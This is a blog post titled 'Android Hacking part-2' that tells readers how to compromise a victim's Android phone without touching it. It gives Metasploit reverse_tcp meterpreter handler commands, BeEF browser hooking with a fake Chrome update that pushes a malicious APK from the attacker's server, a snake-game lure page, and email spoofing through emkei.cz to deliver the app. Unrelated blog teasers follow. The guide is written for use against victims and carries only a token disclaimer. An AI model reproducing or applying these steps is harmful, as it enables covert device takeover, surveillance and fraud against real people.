google.com, pub-9354014135796944, DIRECT, f08c47fec0942fa0 Android Hacking part-2: Install apps without coming in contact with any phone Skip to main content

Android Hacking part-2: Install apps without coming in contact with any phone

Android Hacking part-2: Install apps without coming in contact with any phone

As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.
I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.
If you have any problem, suggestion let me know by comments I help everyone.

Note: This is for education purpose only. Please don’t misuse it.
Requirements
  • beef
  • metasploit
  • Patience  (most of the readers don’t have patience )
Practical
We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.
After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands
service postresql start;msfconsole
It will launch Metasploit. Further commands
use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost ; set lport 4444
Remain this terminal as and follow further steps.
Launch beef. In Kali, you can start from the sidebar.launch beef in kali linuxIn parrot or any other security distribution, you can launch using this command.
beef-xss
Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.

As you can see in the screenshot, it asks for the username and password. These are default username and password.
beef
beef
beef default username-password
After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.
Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.hook browser example
To hook own browser visit this link http://127.0.0.1:3000/demos/basic.htmlor insert script tag. When you open this beef will show something like this.
hooked browser

Meaning you hooked your browser (127.0.0.1 mean your browser).  Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.fake update for android hacking
Open a new terminal and type ifconfig to find your IP address.
In my case, it is 192.168.43.7.
To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.
Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.
In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.
fake update for android hacking
Just run this command.
service apache2 start
After this copy your android virus that you generated in the first step to /var/www/directory. So URL of the Android virus is http:///appname.apk

I think you know how to find local IP address. Paste in URL tab of beef and click on execute.
On executing your android phone will show you something like this.
installl missing plugins (hack android phone using metasploit
If you choose Install Missing Plugins, then the app will start downloading.hack android phone
Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing). installl and opening app
But we will get a meterpreter session.
session open
I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.

How to perform a real task

In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.
I found a snake script. It is the game developed using JavaScript you can download it from GitHub.
Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.
Here are simple steps to do this.
First of clone this game from Github.
git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html

If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.
It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.
Press ctrl+o to save ctrl+x to exit.
Now, send URL http://192.168.43.60/Snake-game/snakegame.html to your victim. You can port forward your router to perform it over the internet.
Now when our victim opens the link, he will see something like this.how to hack android phone part 2
And we will get hook that browser.  After that repeat above steps to install apps
Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.

Part-2 Email spoofing

As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.
Don’t confuse by above words there are tools and websites.
I use https://emkei.cz/ For sending spoofing emails.
This website has a straightforward interface. Just enter to, from, subject, message and send the message.
But Gmail service will catch it and move emails to spam.
In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.
Here is the screenshot of mail I send to my webmail using this website. 
Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.
Problem with this method is who used webmail on the android phone, or my victim is using Gmail.
Well, this is part of social engineering. You should find your way to hack your victim phone.Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.

Comments

Popular posts from this blog

Best Android keyboard Apps: Modify Your Typing Accuracy

Best Android keyboard Apps: Modify Your Typing Accuracy Android is a great operating system.  The keyboard is one of the most important things that we use in android. By default, android comes with default keyboard but there is a number of third-party keyboard apps available for the android. Some of them are free and some are paid. In this article, I will tell you the  best Android keyboards apps. keyboard apps that I have listed here are best. In the end, it totally depends upon you which type of keyboard you like. Either you want an app with functionality or with awesome design or whatever you like. You will find every type of app here. With time I will keep updating this article. If you think that I miss an app that let me know by comments. Top Android keyboard: You will love these apps : ) By the way, if you like my writing then let me know by comments Swiftkey keyboard: one of the best creative keyboard This is an awesome app. You know everybody like the iPhone. But If you are

How to Download Videos From Facebook

How to Download Videos From Facebook Facebook is getting popular day by day. I think there is no person who does not have an account on Facebook. Facebook is trying to compete with youtube. I mean they are doing everything. They have created own video platform like youtube. Now you can earn money with by making videos on the facebook. I have tried to find only Best Way to how to download videos from the facebook. I hope you will like them. If you have any problem then let me know by comments. I will happy to help you. Other Articles to Read How to Download Videos From Youtube Best Websites to download Movies Free How to Download Videos From Facebook There are many ways to download videos from facebook. There are many ways to download video from facebook. FB down Open website  fbdown.net   You will see something like this. No, Find that video URL that you want to download. Copy that and paste in the input field and click on the download button As shown in the screenshot. When you

Format used by Yahoo boys to scam individuals

In the recent years, there are more and more so-called “Yahoo boys” on the Internet. Who are they and why are they dangerous? Which steps can you take to avoid them once and for all? Learn everything about Yahoo format for dating and how it works. Yahoo boy format: what is it? Yahoo boys are called so because of their usual e-mail accounts, which are made under the Yahoo platform. They are use these e-mails for committing their internet crimes. Usually, these people have no legal job or business, so they choose to deceive people. Yahoo boys are, according to the law, those people who carry out internet fraud. This is the article in Nigerian Criminal Code, which means the fraud crime. In the early 2000s, with the common arrival of the worldwide web to Africa, the Internet crimes have become a way to earn money both legitimately and illegitimately. According to the official statistics carried out by the police, thousands of university students in Nigeria are involved in the Internet